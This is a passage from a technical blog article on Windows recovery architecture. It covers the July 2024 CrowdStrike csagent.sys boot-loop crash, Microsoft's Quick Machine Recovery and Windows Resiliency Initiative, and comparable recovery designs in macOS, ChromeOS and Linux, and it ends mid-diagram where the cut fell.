&lt;h3&gt;The crash&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s Windows Error Reporting analysis, published in the security blog on July 27, 2024, recorded the global crash signature as &lt;code&gt;nt!KeBugCheckEx&lt;/code&gt; followed by &lt;code&gt;nt!KiPageFault&lt;/code&gt; and then &lt;code&gt;csagent+0xe14ed&lt;/code&gt;, with &lt;code&gt;r8=ffff840500000074&lt;/code&gt; as the invalid pointer that the read tried to dereference [@ms-security-jul27]. Microsoft confirmed that the analysis matched CrowdStrike&apos;s own conclusion: a read-out-of-bounds memory safety error in the &lt;code&gt;csagent.sys&lt;/code&gt; driver.&lt;/p&gt;

flowchart TD
    A[Falcon 7.11 ships in Feb 2024 with IPC Template Type declaring 21 fields] --&amp;gt; B[Integration code supplies only 20 inputs]
    B --&amp;gt; C[Latent OOB potential -- no instance references field 21]
    C --&amp;gt; D[July 19 04:09 UTC: new Channel File 291 adds non-wildcard 21st-field criterion]
    D --&amp;gt; E[Content Interpreter reads input-pointer index 20]
    E --&amp;gt; F[Page fault at csagent+0xe14ed]
    F --&amp;gt; G[nt!KiPageFault -&amp;gt; nt!KeBugCheckEx]
    G --&amp;gt; H[Bug check; system reboots]
    H --&amp;gt; I[csagent.sys reloads -- registered SERVICE_SYSTEM_START Start=1 -- bug check again]
    I --&amp;gt; J[Boot loop on 8.5 million endpoints]
&lt;h3&gt;The kernel-resident dependency&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;csagent.sys&lt;/code&gt; loaded early in boot. Microsoft&apos;s WER post-mortem shows the driver registered with &lt;code&gt;REG_DWORD Start 1&lt;/code&gt; -- the &lt;code&gt;SERVICE_SYSTEM_START&lt;/code&gt; class, loaded by the kernel before user-mode comes up [@ms-security-jul27]. That placement is the entire point of a kernel-mode security agent: it has to instrument the kernel boundary at the moment user-mode would otherwise be invisible to it. The cost of that placement is that when an early-boot driver page-faults, the bug check happens &lt;em&gt;before&lt;/em&gt; the operating system is interactive. The remediation -- &lt;em&gt;delete &lt;code&gt;C-00000291*.sys&lt;/code&gt;&lt;/em&gt; -- could not be issued from a running Windows, because there was no running Windows.&lt;/p&gt;

The fault dynamic above is easier to describe than it is to file. CrowdStrike&apos;s own technical-details post is explicit about the file-type distinction: &quot;Although Channel Files end with the SYS extension, they are not kernel drivers&quot; [@crowdstrike-tech-details]. The kernel-mode component is `csagent.sys`. The Channel Files in `C:\Windows\System32\drivers\CrowdStrike\` are *data* that the Content Interpreter inside `csagent.sys` reads. The fault was a bug in `csagent.sys`&apos;s interpretation of a particular Channel File; both ends matter, and the file extension on the data file is incidental.
&lt;h3&gt;The recovery procedure&lt;/h3&gt;
&lt;p&gt;Microsoft published KB5042421 within hours [@ms-kb5042421]. The text reduced to three steps: boot to Safe Mode (which on Windows 11 means letting WinRE select Safe Mode from the &lt;em&gt;Advanced startup options&lt;/em&gt; tree); delete &lt;code&gt;C:\Windows\System32\drivers\CrowdStrike\C-00000291*.sys&lt;/code&gt;; reboot. For BitLocker-encrypted volumes the procedure had a fourth, preliminary step: surface the recovery key. KB5042421 walks the user through the Entra ID self-service flow at &lt;code&gt;aka.ms/aadrecoverykey&lt;/code&gt;: log on from a phone, choose Manage Devices, View BitLocker Keys, Show recovery key [@ms-kb5042421].&lt;/p&gt;
&lt;p&gt;The instruction was correct. It was also unambiguously per-machine.&lt;/p&gt;

We currently estimate that CrowdStrike&apos;s update affected 8.5 million Windows devices, or less than one percent of all Windows machines. -- Microsoft, *Helping our customers through the CrowdStrike outage*, July 20, 2024 [@ms-crowdstrike-jul20].
&lt;h3&gt;The bottleneck&lt;/h3&gt;
&lt;p&gt;Each device&apos;s recovery was a function of &lt;em&gt;time-to-physical-access&lt;/em&gt;, plus &lt;em&gt;time-to-BitLocker-key&lt;/em&gt;, plus &lt;em&gt;time-to-keyboard&lt;/em&gt;. None of those terms scaled. A laptop on a desk that the owner happened to be near recovered in five minutes. A laptop on a desk where the owner was on holiday recovered when someone arrived to swipe their badge. A server in a remote data centre recovered when a hand reached the iLO or KVM. A point-of-sale device in a checked-bag-only baggage hall recovered when someone wheeled a USB keyboard out to it. Multiply by 8.5 million.&lt;/p&gt;
&lt;p&gt;The architecture that delivered Safe Mode to every one of those devices did exactly what its 2009 specification said it would do. The architecture that delivered Safe Mode to every one of those devices left enterprises stranded for days. Both sentences are true. The contradiction is the whole point.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; WinRE booted correctly. The Safe Mode tile rendered. The two-failed-boots trigger fired. The recovery partition was where it should be. The BCD &lt;code&gt;recoverysequence&lt;/code&gt; led to the right &lt;code&gt;winre.wim&lt;/code&gt;. The keyboard handler took keystrokes. Every line of code did what it was specified to do. The single unwritten line of the specification -- &lt;em&gt;one operator, please&lt;/em&gt; -- was the line that did not scale.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The instruction was correct, the procedure was published within hours, and the floor was on fire for days. The next question -- the one Microsoft was already being asked at WESES, the closed-door September 10, 2024 endpoint-security partner summit [@ms-weses] -- was whether the floor could not be on fire next time.&lt;/p&gt;
&lt;h2&gt;6. The Breakthrough: Quick Machine Recovery&lt;/h2&gt;
&lt;p&gt;Quick Machine Recovery, announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024] and generally available on Windows 11 24H2 build 26100.4700+ in August 2025 per the November 18, 2025 update [@ms-wri-ignite-2025], did not add any new &lt;em&gt;technology&lt;/em&gt; to WinRE that had not been in WinPE since 2002. Networking drivers, DHCP clients, HTTPS stacks: all of these were already in &lt;code&gt;winre.wim&lt;/code&gt;&apos;s base image, inherited from the WinPE Optional Components that have shipped with the OS for two decades [@ms-winpe-intro]. What QMR added was an &lt;em&gt;answer to a question WinRE had never been asked&lt;/em&gt;: when you are inside the recovery environment with no operator at the keyboard, who do you call?&lt;/p&gt;

The Windows 11 24H2 feature, available on build 26100.4700 or later, that lets WinRE establish network connectivity from inside the recovery environment, query Windows Update for a remediation matching the current failure signature, download and apply that remediation, and reboot -- all without requiring an operator at the keyboard [@ms-qmr]. Announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024]; first shipped in Windows 11 Insider Preview build 26120.3653 on March 28, 2025 [@ms-qmr-insider-mar2025]; generally available in August 2025 [@ms-wri-ignite-2025].
&lt;h3&gt;The five-phase loop&lt;/h3&gt;
&lt;p&gt;Microsoft Learn documents QMR as five phases [@ms-qmr]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Crash detection.&lt;/strong&gt; The same two-failed-boots trigger already in the Windows RE Technical Reference [@ms-winre-tech-ref] fires the recovery path.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Boot to recovery.&lt;/strong&gt; The existing BCD &lt;code&gt;recoverysequence&lt;/code&gt; mechanism from Section 3 routes the system into WinRE.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Network connection.&lt;/strong&gt; WinRE establishes wired Ethernet, or WPA/WPA2 password-based Wi-Fi using a credential pre-staged via &lt;code&gt;reagentc.exe /SetRecoverySettings&lt;/code&gt;. As of the Microsoft Learn page&apos;s current wording, &lt;em&gt;only&lt;/em&gt; wired and WPA/WPA2 password-based wireless are supported [@ms-qmr]; enterprise certificates and WPA3-Enterprise are on the November 18, 2025 roadmap but not yet shipped [@ms-wri-ignite-2025].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Remediation.&lt;/strong&gt; The recovery environment scans Windows Update for a published remediation matching the device&apos;s failure signature, downloads it, and applies it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reboot.&lt;/strong&gt; On success, the device boots normally. On no-match, the device can either present the manual recovery menu (the &lt;em&gt;one-time scan&lt;/em&gt; mode, the default for unmanaged systems) or loop with a configurable interval (the &lt;em&gt;looped&lt;/em&gt; mode) until either a remediation arrives or the operator-set total wait time expires [@ms-qmr].&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    participant D as Device (OS)
    participant W as WinRE
    participant N as Network
    participant WU as Windows Update
    participant O as OS partition
    D-&amp;gt;&amp;gt;W: Two failed boots -&amp;gt; follow recoverysequence
    W-&amp;gt;&amp;gt;N: Acquire Ethernet or WPA2 Wi-Fi
    W-&amp;gt;&amp;gt;WU: Query for remediation matching failure signature
    WU--&amp;gt;&amp;gt;W: Remediation package (or &quot;none found&quot;)
    alt Remediation available
        W-&amp;gt;&amp;gt;O: Apply remediation to OS partition
        W-&amp;gt;&amp;gt;D: Reboot
        D--&amp;gt;&amp;gt;D: Normal boot succeeds
    else None found, one-time mode
        W-&amp;gt;&amp;gt;D: Present manual recovery menu
    else None found, looped mode
        W--&amp;gt;&amp;gt;W: Sleep wait_interval, retry until total_wait_time
    end
&lt;h3&gt;The default-on/off matrix&lt;/h3&gt;
&lt;p&gt;The Microsoft Learn QMR page is explicit on defaults [@ms-qmr]. Cloud remediation is enabled by default, with one-time scan auto-remediation, on systems that are not under enterprise management -- Windows Home and unmanaged Pro. It is disabled by default on enterprise-managed systems -- Windows Enterprise, Education, and managed Pro. The rationale follows from how those populations think: enterprise administrators want to gate cloud remediation behind their own deployment-ring process, and consumers benefit from the default-on behaviour because they do not have a ring process at all. The same Microsoft Learn page documents an Intune Settings Catalog policy under &lt;em&gt;Remote Remediation &amp;gt; Enable Cloud Remediation&lt;/em&gt; for administrators who want to switch the policy on at the tenant level [@ms-qmr].&lt;/p&gt;
&lt;h3&gt;The test-mode flow&lt;/h3&gt;
&lt;p&gt;QMR ships with a dry-run mechanism. &lt;code&gt;reagentc.exe /SetRecoveryTestmode&lt;/code&gt; configures the WinRE entry for a simulated recovery cycle; &lt;code&gt;reagentc.exe /BootToRe&lt;/code&gt; triggers the cycle on the next reboot; the simulated remediation appears in Settings &amp;gt; Windows Update &amp;gt; Update history rather than mutating the production OS [@ms-qmr]. Microsoft suggests using the test mode to validate the per-device QMR configuration before relying on it in production.&lt;/p&gt;
&lt;h3&gt;The pseudocode&lt;/h3&gt;
&lt;p&gt;The five phases collapse into a short loop. The version below is paraphrased from the Microsoft Learn QMR page [@ms-qmr] and shows how the two settings interact.&lt;/p&gt;
&lt;p&gt;{`
// Paraphrased from the Microsoft Learn QMR specification.&lt;/p&gt;
&lt;p&gt;const config = {
  cloud_remediation_enabled: true,    // default on Home/unmanaged Pro
  auto_remediation_mode: &apos;looped&apos;,    // &apos;one_time&apos; | &apos;looped&apos;
  total_wait_time_minutes: 60,
  wait_interval_minutes: 10,
  wifi: { ssid: &apos;corp-recovery&apos;, psk: &apos;***&apos;, encryption: &apos;WPA2&apos; },
};&lt;/p&gt;
&lt;p&gt;function detectFailureSignature() {
  return { driver: &apos;csagent.sys&apos;, offset: &apos;0xe14ed&apos;, signature: &apos;oob-read&apos; };
}&lt;/p&gt;
&lt;p&gt;function scanWindowsUpdate(signature) {
  if (signature.driver === &apos;csagent.sys&apos; &amp;amp;&amp;amp; signature.signature === &apos;oob-read&apos;) {
    return { id: &apos;qmr-csagent-291&apos;, action: &apos;delete&apos;, path:
      &apos;C\\Windows\\System32\\drivers\\CrowdStrike\\C-00000291*.sys&apos; };
  }
  return null;
}&lt;/p&gt;
&lt;p&gt;function qmrEnterRecovery() {
  console.log(&apos;Phase 1: crash detected (two failed boots)&apos;);
  console.log(&apos;Phase 2: booted into WinRE via BCD recoverysequence&apos;);&lt;/p&gt;
&lt;p&gt;  if (!config.cloud_remediation_enabled) {
    console.log(&apos;Cloud remediation disabled; falling back to Startup Repair&apos;);
    return;
  }&lt;/p&gt;
&lt;p&gt;  console.log(&apos;Phase 3: acquiring network (&apos; + config.wifi.encryption + &apos; Wi-Fi)&apos;);
  const sig = detectFailureSignature();
  let elapsed = 0;&lt;/p&gt;
&lt;p&gt;  while (true) {
    console.log(&apos;Phase 4: scanning Windows Update for remediation matching &apos; + sig.driver);
    const remediation = scanWindowsUpdate(sig);
    if (remediation) {
      console.log(&apos;  -&amp;gt; Applying &apos; + remediation.id + &apos; (delete &apos; + remediation.path + &apos;)&apos;);
      console.log(&apos;Phase 5: reboot into repaired Windows&apos;);
      return;
    }
    if (config.auto_remediation_mode === &apos;one_time&apos;) {
      console.log(&apos;No remediation found; presenting manual recovery menu&apos;);
      return;
    }
    elapsed += config.wait_interval_minutes;
    if (elapsed &amp;gt;= config.total_wait_time_minutes) {
      console.log(&apos;Looped mode exhausted; falling back to manual recovery menu&apos;);
      return;
    }
    console.log(&apos;  -&amp;gt; No match; sleeping &apos; + config.wait_interval_minutes + &apos; min&apos;);
  }
}&lt;/p&gt;
&lt;p&gt;qmrEnterRecovery();
`}&lt;/p&gt;
&lt;h3&gt;The counterfactual&lt;/h3&gt;
&lt;p&gt;Had QMR existed on July 19, 2024, the per-device labour would have been zero. Microsoft and CrowdStrike would have published a Windows Update remediation that deletes &lt;code&gt;C-00000291*.sys&lt;/code&gt;; every affected device would have entered WinRE on its second failed boot, picked up the remediation, applied it, and rebooted. The 8.5-million-device fleet cost would have collapsed from operator-days to network-minutes. The CrowdStrike RCA published August 6, 2024 documents that the fault-to-rollback time was 78 minutes [@crowdstrike-tech-details, @crowdstrike-rca-pdf]; QMR would have made &lt;em&gt;time-to-rollback&lt;/em&gt; and &lt;em&gt;time-to-fleet-recovery&lt;/em&gt; the same number, plus the per-device Windows Update transit. That is the empirical case Microsoft is making.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Quick Machine Recovery did not add new technology to WinRE. It added a question. WinRE has always had networking drivers; it had never been told it had permission to phone home. The technical innovation is policy, not code -- the &lt;em&gt;Windows Update endpoint&lt;/em&gt; framing is a commitment that the recovery environment may, in well-defined circumstances, act on behalf of the operator who is not there.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;QMR re-priced the per-device cost of recovery from O(N) to roughly O(1). But QMR alone does not explain why Microsoft is calling this the &lt;em&gt;Windows Resiliency Initiative&lt;/em&gt; rather than the &lt;em&gt;Quick Machine Recovery Release&lt;/em&gt;. The next section unpacks the five layers WRI puts around QMR.&lt;/p&gt;
&lt;h2&gt;7. The Program: The Windows Resiliency Initiative as Five Layers&lt;/h2&gt;
&lt;p&gt;WRI is not one feature. It is a layered program. Each layer is a Microsoft-named deliverable with a Microsoft-cited source. The temptation, on reading any single WRI blog post, is to confuse the layer with the program. The layers are concentric. They are also dated.&lt;/p&gt;
&lt;p&gt;Walk the five layers. Each has a Microsoft term, a primary anchor, and a published status as of November 18, 2025.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Microsoft term&lt;/th&gt;
&lt;th&gt;Anchor&lt;/th&gt;
&lt;th&gt;Status as of Nov 18, 2025&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Prevent: stop bad updates leaving the partner&lt;/td&gt;
&lt;td&gt;Safe Deployment Practices (SDP), part of &lt;strong&gt;MVI 3.0&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;[@ms-wri-ignite-2024], [@ms-mvi], [@ms-wri-jun-2025]&lt;/td&gt;
&lt;td&gt;Effective April 1, 2025 [@ms-wri-ignite-2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent: stop bad code being kernel-resident&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Windows endpoint security platform&lt;/strong&gt; (user-mode antivirus)&lt;/td&gt;
&lt;td&gt;[@ms-wri-ignite-2024], [@ms-wri-jun-2025], [@ms-wri-ignite-2025]&lt;/td&gt;
&lt;td&gt;Private preview July 2025; named partners in [@ms-wri-jun-2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manage: see the incident at scale&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Intune surfaces WinRE state&lt;/strong&gt;; Mission Critical Services for Windows&lt;/td&gt;
&lt;td&gt;[@ms-wri-ignite-2025]&lt;/td&gt;
&lt;td&gt;Coming soon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recover: heal the unbootable machine&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Quick Machine Recovery&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;[@ms-wri-ignite-2024], [@ms-qmr], [@ms-wri-ignite-2025]&lt;/td&gt;
&lt;td&gt;GA August 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recover: rebuild without shipping hardware&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Point-in-Time Restore&lt;/strong&gt;, &lt;strong&gt;Cloud Rebuild&lt;/strong&gt;, &lt;strong&gt;Windows 365 Reserve&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;[@ms-wri-ignite-2025]&lt;/td&gt;
&lt;td&gt;PITR Insider preview Nov 2025; W365R GA; Cloud Rebuild coming&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    subgraph L1[1. Prevent: stop bad updates at the partner -- MVI 3.0 SDP]
      subgraph L2[2. Prevent: stop bad code being kernel-resident -- user-mode AV platform]
        subgraph L3[3. Manage: see the incident at scale -- Intune surfaces WinRE state]
          subgraph L4[4. Recover the unbootable: Quick Machine Recovery]
            subgraph L5[5. Rebuild without shipping hardware: PITR / Cloud Rebuild / W365 Reserve]
              CORE[Windows endpoint -- recoverable at fleet scale]
            end
          end
        end
      end
    end
&lt;h3&gt;Layer 1: Safe Deployment Practices and MVI 3.0&lt;/h3&gt;
&lt;p&gt;Microsoft Virus Initiative 3.0 became effective on April 1, 2025 [@ms-wri-ignite-2025]. Membership now requires partners to commit to four named obligations [@ms-mvi]: a signed nondisclosure agreement; use of Microsoft Trusted Signing (the hosted descendant of &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt;) for AV/EDR driver code-signing; documented Safe Deployment Practices for content updates (gradual rollouts with deployment rings and monitoring); and certification within the last 12 months by at least one of AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, or West Coast Labs [@ms-mvi]. The June 26, 2025 WRI update lists eight named partner endorsements -- Bitdefender (Florin Virlan), CrowdStrike (Alex Ionescu), ESET (Juraj Malcho), SentinelOne (Stefan Krantz), Sophos (John Peterson), Trellix (Jim Treinen), Trend Micro (Rachel Jin), and WithSecure (Johannes Rave) -- and the November 18, 2025 update confirms the effective date verbatim: &quot;Effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners to maintain signing rights for Windows AV drivers&quot; [@ms-wri-jun-2025, @ms-wri-ignite-2025].&lt;/p&gt;

Microsoft&apos;s program for third-party antivirus and endpoint detection vendors that ship products on Windows. MVI 3.0, effective April 1, 2025, adds Safe Deployment Practices, mandatory Trusted Signing, NDA, and 12-month independent test-lab certification as preconditions to maintain Windows AV driver signing rights [@ms-mvi, @ms-wri-ignite-2025].
&lt;p&gt;The model is structurally identical to the canary / progressive-rollout pattern formalised in the Google SRE Book chapter on Release Engineering: hermetic builds, multiple deployment rings, gated promotion between rings, &quot;Push on Green&quot;, and the option to cherry-pick at the same revision when a critical change is needed mid-cycle [@sre-release-eng]. MVI 3.0 is not a Microsoft invention; it is a Microsoft &lt;em&gt;mandate&lt;/em&gt; of a model that has been industry practice for two decades. The mandate is what is new.&lt;/p&gt;
&lt;h3&gt;Layer 2: The Windows endpoint security platform&lt;/h3&gt;
&lt;p&gt;The same November 19, 2024 keynote committed to a &lt;em&gt;Windows endpoint security platform&lt;/em&gt; that lets partners ship their detection logic outside kernel mode, with a private preview promised to security-partner programs by July 2025 [@ms-wri-ignite-2024]. The June 26, 2025 update confirmed the date with named partner endorsements [@ms-wri-jun-2025]. The architectural premise is the one BSOD survivors recognise immediately: a faulty user-mode component can be killed by Task Manager; a faulty kernel-mode driver bug-checks the system.&lt;/p&gt;

Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft, *Preparing for what&apos;s next*, November 18, 2025 [@ms-wri-ignite-2025].
&lt;p&gt;Microsoft is careful to frame WRI as a floor-raiser, not a kernel ban. The November 18, 2025 update enumerates the driver-resiliency playbook for the surfaces that &lt;em&gt;will&lt;/em&gt; remain in kernel mode: mandatory compiler safeguards (control-flow integrity, &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;CFG&lt;/a&gt;, stack canaries), driver isolation, DMA-remapping, a higher signing bar, and expanded in-box Microsoft drivers and APIs that third parties can call rather than reimplementing [@ms-wri-ignite-2025]. The argument is that the kernel surface that &lt;em&gt;must&lt;/em&gt; exist (graphics, storage, some networking) should be smaller, better isolated, and equipped with mitigations that contain a single fault.&lt;/p&gt;
&lt;p&gt;The June 2025 partner roster is the most pointed piece of evidence that the user-mode direction predates and outlasts the July 2024 incident. CrowdStrike itself is named [@ms-wri-jun-2025]. The vendor that started the chain reaction is publicly endorsing the architectural concession the chain reaction priced into existence.&lt;/p&gt;

The Windows Resiliency Initiative is not Microsoft&apos;s only post-2023 security program. The umbrella is the *Secure Future Initiative* (SFI), announced in November 2023 as the company-wide response to identity-based attacks on Microsoft itself. WRI is the workstream inside SFI that owns Windows availability, kernel resilience, and the recovery path; SFI also owns identity hardening, supply-chain controls, and engineering culture changes. Microsoft&apos;s published WRI blogs are explicit that the recoverability program is &quot;the Windows pillar of our Secure Future Initiative&quot; framing, not a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].
&lt;h3&gt;Layer 3: Intune-surfaced WinRE state&lt;/h3&gt;
&lt;p&gt;The November 18, 2025 update names a new Intune signal: &quot;Intune will surface when a Windows device has booted into the Windows Recovery Environment (WinRE)&quot; [@ms-wri-ignite-2025]. The same signal will appear in the Azure Portal for Windows Server VMs that switched into WinRE. The same update introduces a WinRE plug-in model: IT administrators can push custom recovery scripts through Intune, with the model documented as third-party-MDM-adoptable. Both are &quot;coming soon&quot; as of that announcement [@ms-wri-ignite-2025].&lt;/p&gt;
&lt;p&gt;The architectural insight here is that &lt;em&gt;Microsoft-pushed remediations&lt;/em&gt; (QMR) and &lt;em&gt;administrator-pushed remediations&lt;/em&gt; (Intune scripts) must be expressible against the same WinRE surface, with Intune providing the visibility and audit layer.&lt;/p&gt;
&lt;h3&gt;Layer 4: Quick Machine Recovery&lt;/h3&gt;
&lt;p&gt;Already covered in Section 6. Status: GA August 2025 on Windows 11 24H2 build 26100.4700+ [@ms-qmr, @ms-wri-ignite-2025]. Autopatch QMR management is in preview at the November 2025 announcement [@ms-wri-ignite-2025].&lt;/p&gt;
&lt;h3&gt;Layer 5: Rebuild without shipping hardware&lt;/h3&gt;
&lt;p&gt;The November 18, 2025 update introduces three Microsoft-cloud-side recovery actions [@ms-wri-ignite-2025]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Point-in-Time Restore (PITR).&lt;/strong&gt; Cloud-orchestrated rollback to an earlier point-in-time snapshot of the device&apos;s full state. Status: available in the Windows Insider preview build the week of the announcement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Rebuild.&lt;/strong&gt; Intune-portal-triggered clean OS reimage using Autopilot for zero-touch provisioning, with user data and settings restored from OneDrive and Windows Backup for Organizations. Status: coming.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Windows 365 Reserve.&lt;/strong&gt; A temporary Cloud PC for users whose endpoint is unusable. Status: generally available.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each of these targets a scenario QMR cannot fix. PITR addresses regressions that the user-mode WU pipeline cannot patch back -- driver downgrades that need to roll back state, not push a new patch. Cloud Rebuild addresses devices whose local Windows is genuinely beyond surgical repair. Windows 365 Reserve addresses the productivity gap while the local device is being recovered.&lt;/p&gt;
&lt;p&gt;All five layers are anchored on Microsoft blogs and Microsoft Learn pages. None of them is unique to Microsoft. Apple, ChromeOS, and the Linux atomic distributions have each chosen a different layered architecture for the same problem. What does the field actually look like?&lt;/p&gt;
&lt;h2&gt;8. Competing Models: Apple, ChromeOS, and the Linux Atomic Distributions&lt;/h2&gt;
&lt;p&gt;Microsoft is not the first vendor to treat recovery as part of its security architecture. It is, at consumer scale, among the last. Apple, Google, and the Linux atomic-distribution community each picked a different layer to anchor on.&lt;/p&gt;
&lt;h3&gt;Apple macOS: Signed System Volume + paired/fallback recoveryOS + 1TR&lt;/h3&gt;
&lt;p&gt;macOS 10.15 (Catalina, 2019) introduced the read-only system volume. macOS 11 (Big Sur, 2020) added the &lt;em&gt;Signed System Volume&lt;/em&gt; on top of it: a SHA-256 Merkle tree over every block of the system volume, sealed by Apple at install or update time [@apple-ssv]. On Apple Silicon, the bootloader verifies the seal before transferring control to the kernel; on Intel-based Macs with the T2 Security Chip, the bootloader forwards the measurement and signature to the kernel, which verifies the seal directly before mounting the root file system [@apple-ssv]. On verification failure, the Mac drops into recoveryOS automatically and prompts the user to reinstall.&lt;/p&gt;
&lt;p&gt;The recovery side has three flavours [@apple-boot]: a &lt;em&gt;paired recoveryOS&lt;/em&gt; that exactly matches the installed system version; on Apple Silicon, a &lt;em&gt;fallback recoveryOS&lt;/em&gt; (the previous OS version); and a hardware-anchored &lt;em&gt;1TR&lt;/em&gt; (&quot;one true recovery&quot;) environment that survives even when the paired recoveryOS is broken. The 1TR environment is anchored in the Secure Enclave, which is the macOS analogue of Windows&apos;s signed &lt;code&gt;bootmgfw.efi&lt;/code&gt; on the EFI System Partition.&lt;/p&gt;
&lt;p&gt;What Apple excels at is &lt;em&gt;tampered&lt;/em&gt; system files and &lt;em&gt;failed&lt;/em&gt; updates: the first block read fails Merkle verification; the snapshot pointer flips to the prior good snapshot; the user reboots into a working system. What Apple does &lt;em&gt;not&lt;/em&gt; have is an analogue of QMR&apos;s targeted remediation pipeline. The macOS answer to a faulty signed third-party security agent is &quot;reinstall macOS&quot;. That is wipe-and-reload, not surgical repair.&lt;/p&gt;
&lt;h3&gt;ChromeOS: Verified Boot + A/B root partitions + auto-rollback&lt;/h3&gt;
&lt;p&gt;ChromeOS&apos;s verified-boot design has been the same since 2010 [@chromium-verified-boot]. A read-only boot stub, anchored in write-protected EEPROM, computes a cryptographic hash of the read-write firmware (SHA-1 in the original 2010 specification; SHA-256 in current production firmware) and verifies an RSA signature (at least 2048 bits) against a permanently stored public key [@chromium-verified-boot]. The verified read-write firmware then hashes the kernel and verifies its signed hashes. A transparent block device in the kernel verifies each block against a stored hash tree on every read, with the tree&apos;s root signed by the firmware.&lt;/p&gt;
&lt;p&gt;The recovery story is the brilliant part. ChromeOS devices have two root partitions, &lt;em&gt;ROOT-A&lt;/em&gt; and &lt;em&gt;ROOT-B&lt;/em&gt;, plus a separate stateful partition for user data [@chromium-autoupdate]. Each root partition carries a &lt;code&gt;remaining_attempts&lt;/code&gt; counter (default 6) stored in unused GPT bits next to the bootable flag. On N consecutive failed boots, the boot loader falls back to the &lt;em&gt;other&lt;/em&gt; partition. Auto-updates always write to the partition not currently in use, never the booted one. The result is that ChromeOS recovers from a faulty signed system update in &lt;em&gt;one reboot&lt;/em&gt; per device, automatically, without an operator action. This is the empirical upper bound on automation: no fielded platform recovers a signed-but-faulty boot path faster than one reboot.&lt;/p&gt;
&lt;h3&gt;Linux atomic distributions: OSTree, rpm-ostree, bootc&lt;/h3&gt;
&lt;p&gt;OSTree, the upstream of Fedora&apos;s atomic desktops and CoreOS, is &quot;Git for operating system binaries&quot; [@fedora-silverblue]. It stores content-addressed objects under &lt;code&gt;/ostree/repo&lt;/code&gt;, builds atomic &lt;em&gt;deployments&lt;/em&gt; as hardlink farms under &lt;code&gt;/boot/loader/entries/ostree-$stateroot-$checksum.$serial.conf&lt;/code&gt;, performs a three-way merge of &lt;code&gt;/etc&lt;/code&gt; between the booted deployment and the new one, and atomically swaps the boot directory by flipping a symlink between &lt;code&gt;/ostree/boot.0&lt;/code&gt; and &lt;code&gt;/ostree/boot.1&lt;/code&gt; [@ostree-atomic]. The crash-safe guarantee is verbatim: &quot;if the system crashes or you pull the power, you will have either the old system, or the new one&quot; [@ostree-atomic].&lt;/p&gt;
&lt;p&gt;Fedora Silverblue, Fedora CoreOS, Endless OS, and (since 2024) Fedora&apos;s bootc container-based desktops all ship OSTree by default [@fedora-silverblue]. Where OSTree excels is server fleets and developer workstations; where it struggles is layered third-party packages crossing deployments (the rebase/deploy friction) and the absence of a network-reachable in-recovery remediation analogue to QMR.&lt;/p&gt;
&lt;h3&gt;Traditional Linux: dracut + GRUB rescue + initramfs&lt;/h3&gt;
&lt;p&gt;The &quot;manual safe-mode + delete-the-file&quot; model. A skilled operator with shell access plus iLO / iDRAC / IPMI serial-over-LAN can repair a Linux box; everyone else is in trouble. The CrowdStrike-style incident response on traditional Linux would look exactly the same as it did on Windows: per-device, skilled operator, no automation. The Linux distributions that &lt;em&gt;did&lt;/em&gt; avoid this fate are the OSTree-based atomic ones; the conventional ones are at the same operator-bound floor Windows just climbed off.&lt;/p&gt;

flowchart TB
    subgraph WIN[Windows: WinRE + QMR]
      WIN_WIM[winre.wim on recovery partition or in OS-volume folder] --&amp;gt; WIN_WU[Windows Update endpoint]
    end
    subgraph APL[Apple: macOS]
      APL_PR[Paired recoveryOS] --&amp;gt; APL_SNAP[APFS snapshot revert]
      APL_FB[Fallback recoveryOS / 1TR in Secure Enclave] --&amp;gt; APL_SNAP
    end
    subgraph CHR[ChromeOS]
